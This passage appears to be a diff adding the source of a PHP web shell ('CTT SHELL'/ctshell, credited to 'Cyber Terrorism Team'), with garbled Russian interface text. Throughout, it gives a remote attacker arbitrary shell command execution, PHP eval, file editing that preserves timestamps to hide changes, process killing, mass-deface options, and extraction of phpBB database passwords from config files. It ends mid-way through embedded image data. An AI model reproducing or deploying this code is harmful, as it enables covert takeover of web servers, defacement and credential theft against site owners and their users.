+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïğèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+$cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+$v = str_replace("\\","/",$v);
+if (is_dir($v))
+{
+ if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+ $v .= "*";
+}
+$cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+if (in_array($v,$ret)) {fs_rmobj($v);}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïğèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+while ($o = readdir($h)) {$list[] = $d.$o;}
+closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Íå ìîæåò îòêğûòü ñïğàâî÷íèê (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; 
+  if ($vd == "f")
+  {
+$row = array();
+$row[] = "<b><center>Èìÿ</b>";
+$row[] = "<b><center>Ğàçìåğ</center></b>";
+$row[] = "<b><center>Èçìåíåí</center></b>";
+if (!$win)
+  {$row[] = "<b><center>Âëàäåëåö/Ãğóïïà</center></b>";}
+$row[] = "<b><center>Ïğàâà</center></b>";
+$row[] = "<b><center>Ôóíêöèè</center></b>";
+
+$k = $sort[0];
+if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+if (empty($sort[1])) {$sort[1] = "d";}
+if ($sort[1] != "a")
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
+}
+else
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
+}
+
+$row[$k] .= $y;
+for($i=0;$i<count($row)-1;$i++)
+{
+ if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+}
+
+$tab = array();
+$tab[cols] = array($row);
+$tab[head] = array();
+$tab[dirs] = array();
+$tab[links] = array();
+$tab[files] = array();
+
+foreach ($list as $v)
+{
+ $o = basename($v);
+ $dir = dirname($v);
+  
+ if ($disp_fullpath) {$disppath = $v;}
+ else {$disppath = $o;}
+ $disppath = str2mini($disppath,60);
+  
+ if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+ elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+ $uo = urlencode($o);
+ $ud = urlencode($dir);
+ $uv = urlencode($v);
+
+ $row = array();
+
+if (is_dir($v))
+ {
+  if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+  else {$type = "DIR";}
+  $row[] =  "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = $type;
+ }
+ elseif(is_file($v))
+ {
+  $ext = explode(".",$o);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $row[] =  "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = view_size(filesize($v));
+ }
+ $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
+  
+ if (!$win)
+ {
+  $ow = @posix_getpwuid(fileowner($v));
+  $gr = @posix_getgrgid(filegroup($v));
+  $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
+ }
+
+ if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
+ else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+ if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+ else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+
+ if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+ elseif (is_link($v)) {$tab[links][] = $row;}
+ elseif (is_dir($v)) {$tab[dirs][] = $row;}
+ elseif (is_file($v)) {$tab[files][] = $row;}
+}
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+global $v;
+return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+$tab[dirs] = array_reverse($tab[dirs]);
+$tab[files] = array_reverse($tab[files]);
+  }
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<TABLE class=table1  cellSpacing=0 cellPadding=0 width=100% border=0>
+<form method=\"POST\">";
+$smsn=0;
+  foreach($table as $row)
+  {
+$smsn++;
+ if ($smsn!=2 && $smsn!=3) { 
+echo "<tr>\r\n";
+foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
+echo "</tr>\r\n";
+}
+
+  }
+  echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
+<tr class=tr2>
+<td width=8% height=1%><font size=2 color=#000000>
+Ïàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td>
+<td width=8% height=1%><font size=2 color=#000000> Ôàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
+if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Âñòàâèòü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Ïóñòîé áóôåğ\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">Ñ îòîáğàííûì:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Óäàëèòü</option>";
+  if ($usefsbuff)
+  {
+echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Âûğàçàòü</option>";
+echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Êîïèğîâàòü</option>";
+echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Íåâûáğàòü</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Íåâûáğàòü</option>";}
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Ïîäòâåğäèòü\">";
+  echo "</form>";
+
+echo "</td></tr></table>";
+echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
+ }
+
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Ğåçóëüòàò âûïîëíåíèÿ ıòà êîìàíäà</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+myshellexec($cmd);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($cmd_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($cmd_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ myshellexec($cmd);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Êîìàíäà âûïîëíåíèÿ:</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Âûïîëíèòü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Ïğîöåññû:</b><br>";
+ if ($win) {
+echo "<pre>";
+system('tasklist');
+echo "</pre>";
+}
+ else
+ {
+  if ($pid)
+  {
+if (!$sig) {$sig = 9;}
+echo "Sending signal ".$sig." to #".$pid."... ";
+$ret = posix_kill($pid,$sig);
+if ($ret) {echo "ok. he is dead, amen.";}
+else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+$ret = htmlspecialchars($ret);
+$ret = str_replace(""," ",$ret);
+while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+$prcs = explode("\n",$ret);
+$head = explode(" ",$prcs[0]);
+$head[] = "ACTION";
+unset($prcs[0]);
+echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+echo "<tr border=\"1\">";
+foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+echo "</tr>";
+foreach ($prcs as $line)
+{
+ if (!empty($line))
+ {
+  echo "<tr>";
+  $line = explode(" ",$line);
+  $line[10] = join(" ",array_slice($line,10,count($line)));
+  $line = array_slice($line,0,11);
+  $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+  foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+  echo "</tr>";
+ }
+}
+echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Ğåçóëüòàò âûïîëíåíèÿ ıòîò PHP-êîä</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+eval($eval);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($eval_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($eval_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>PHP-êîä âûïîëíåíèÿ</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Âûïîëíèòü\"></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+
+  echo "<b>Ğàññìîòğåíèå ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+ 
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+echo "<b>Information:</b>";
+echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+if (!$win)
+{
+ echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
+ $tmp=posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+}
+echo "<tr class=tr><td><b>Perms</b></td><td>";
+
+if (is_writable($d.$f))
+{
+ echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+}
+else
+{
+ echo "<font>".view_perms(fileperms($d.$f))."</font>";
+}
+
+echo "</td></tr>";
+echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+echo "</table><br>";
+
+
+$fi = fopen($d.$f,"rb");
+if ($fi)
+{
+ if ($fullhexdump)
+ {
+  echo "<b>FULL HEXDUMP</b>";
+  $str=fread($fi,filesize($d.$f));
+ }
+ else
+ {
+  echo "<b>HEXDUMP PREVIEW</b>";
+  $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ }
+ $n=0;
+ $a0="00000000<br>";
+ $a1="";
+ $a2="";
+ for ($i=0; $i<strlen($str); $i++)
+ {
+  $a1.=sprintf("%02X",ord($str[$i])).' ';
+  switch (ord($str[$i]))
+  {
+case 0:  $a2.="<font class=s2>0</font>"; break;
+case 32: 
+case 10:
+case 13: $a2.="&nbsp;"; break;
+default:  $a2.=htmlspecialchars($str[$i]);
+  }
+  $n++;
+  if ($n == $hexdump_rows)
+  {
+$n = 0;
+if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+$a1.="<br>";
+$a2.="<br>";
+  }
+ }
+ echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+}
+$encoded = "";
+if ($base64 == 1)
+{
+ echo "<b>Base64 Encode</b><br>";
+ $encoded = base64_encode($r);
+}
+elseif($base64 == 2)
+{
+ echo "<b>Base64 Encode + Chunk</b><br>";
+ $encoded = chunk_split(base64_encode($r));
+}
+elseif($base64 == 3)
+{
+ echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+ $encoded = base64_encode($r);
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+}
+elseif($base64 == 4)
+{
+}
+if (!empty($encoded))
+{
+ echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+}
+echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+if ($white) {@ob_clean();}
+echo $r;
+if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+echo "<pre>";
+var_dump(parse_ini_file($d.$f,true));
+echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+echo "<pre>";
+$v = explode("|",$r);
+echo $v[0]."<br>";
+var_dump(unserialize($v[1]));
+echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+echo "<pre>";
+var_dump(unserialize(base64_decode($r)));
+echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+{
+ $arr = explode("
+",$r);
+ if (count($arr == 18))
+ {
+  include($d.$f);
+  echo "<b>phpBB configuration is detected in this file!<br>";
+  if ($dbms == "mysql4") {$dbms = "mysql";}
+  if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+  else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
+  echo "Parameters for manual connect:<br>";
+  $cfgvars = array(
+  "dbms"=>$dbms,
+  "dbhost"=>$dbhost,
+  "dbname"=>$dbname,
+  "dbuser"=>$dbuser,
+  "dbpasswd"=>$dbpasswd 
+  );
+  foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+  echo "</b>";
+  echo "<hr size=\"1\" noshade>";
+ }
+}
+echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+if (!empty($white)) {@ob_clean();}
+if ($rehtml) {$r = rehtmlspecialchars($r);} 
+$r = stripslashes($r); 
+$strip = false;
+if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+$r = @highlight_string($r, TRUE); 
+if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+echo $r;
+if (!empty($white)) {exit;}
+echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+@ob_clean();
+header("Content-type: ctshell");
+header("Content-disposition: attachment; filename=\"".$f."\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "notepad")
+  {
+@ob_clean();
+header("Content-type: text/plain"); 
+header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "img")
+  {
+if (!$white)
+{
+ echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+}
+else
+{
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: image/gif"); 
+ echo($r); 
+ exit;
+}
+  }
+  elseif ($ft == "edit")
+  {
+if (!empty($submit))
+{
+ if ($filestealth) {$stat = stat($d.$f);}
+ if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "<b>Can't write to file!</b>";}
+ else
+ {
+  echo "<b>Ñîõğàí¸íü!!!</b>";
+  fwrite($fp,$nfcontent);
+  fclose($fp);
+  if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+  $r = $nfcontent;
+ }
+}
+$rows = count(explode("
+",$r));
+if ($rows < 10) {$rows = 10;}
+if ($rows > 30) {$rows = 30;}
+echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Ñîõğàíèòü\">&nbsp;<input type=\"reset\" value=\"Ñáğîñ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}
+$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
